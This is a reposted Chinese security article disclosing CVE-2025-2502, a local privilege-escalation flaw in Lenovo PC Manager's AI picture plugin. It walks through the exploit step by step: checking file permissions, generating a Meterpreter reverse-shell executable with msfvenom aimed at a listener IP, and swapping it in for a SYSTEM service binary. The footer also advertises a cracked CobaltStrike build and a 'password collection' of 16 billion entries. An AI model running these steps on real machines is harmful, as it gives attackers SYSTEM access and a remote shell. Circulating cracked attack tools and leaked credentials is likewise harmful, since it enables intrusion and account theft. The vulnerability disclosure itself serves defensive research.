文章总结： 本文披露了联想电脑管家本地权限提升漏洞CVE-2025-2502，因工具文件权限配置错误，普通用户对AI看图插件等服务的可执行文件拥有完全控制权。攻击者可利用此漏洞将System权限服务文件替换为恶意程序，通过重启获取System级最高权限。 综合评分： 85 文章分类： 漏洞分析,漏洞POC,终端安全

联想电脑管家权限提升漏洞 CVE-2025-2502

IHK-1

刨洞安全团队

2025年9月30日 16:20 广东

学习本地权限提升的过程中无意中发现的。

在联想电脑管家的任意版本中，联想电脑管家的工具都存在权限缺陷，只要是下载的工具，普通用户拥有 F 权限（完全权限）

由于所有版本的工具都存在权限问题，普通用户可以进如 admin 权限，这边使用 ai 看图插件演示，因为其有 system 权限服务，可以提升至 system，在 5.1.100.1102 之前，联想电脑管家存在插件 AI 看图

在安装 AI 看图插件后，其存在一个可持续服务

C:\ProgramData\Lenovo\devicecenter\modules\aipicture\5.1.80.8121\kpicservice.exe

使用 icacls 查看其文件权限

发现普通 Users 权限为 IF，完全权限，创建一个普通用户

切入攻击视角，在 Administors 用户组未登入的情况下，需要注销所有用户，我们再进入 user1 用户，使用 sc 查看服务，其用户为 LocalSystem

sc qc KPICService_Lenovo

其中

C:\ProgramData\Lenovo\devicecenter\modules\aipicture\5.1.80.8121\kpicservice.exe 就是普通用户拥有完全控制的文件

但是因为限制，该服务会一直占用，普通用户需要 admin 才能进行关闭

尝试更换思路：因为普通用户有完全控制权限，普通用户将文件进行移动，重启时，服务读取配置路径，还是会以 LocalSystem 运行 kpicservice.exe

现在开始实践，先生成一个 kpicservice.exe

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.100.133 LPORT=4444 -f exe -o kpicservice.exe

同时将原文件路径进行移动 ，并将 shell 替换原文件的 kpicservice.exe

move C:\ProgramData\Lenovo\devicecenter\modules\aipicture\5.1.80.8121\kpicservice.exe kpicservice.exe
move Desktop\kpicservice.exe C:\ProgramData\Lenovo\devicecenter\modules\aipicture\5.1.80.8121\kpicservice.exe

此时再重启设备，服务会启动路径中即被替换的 kpicservice ，获得 system 权限

原文链接：https://github.com/IHK-ONE/CVE-2025-2502

关注公众号后台回复 0001 获取完整AD域渗透思维导图，0002 获取 Windows11渗透集成环境，0003 获取 WBG 破解 CobaltStrike 4.9.1，0004 获取160亿密码合集，0005 获取市面上最好用的进程识别

加我微信好友，邀请你进交流群

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：刨洞安全团队 IHK-1《联想电脑管家权限提升漏洞 CVE-2025-2502》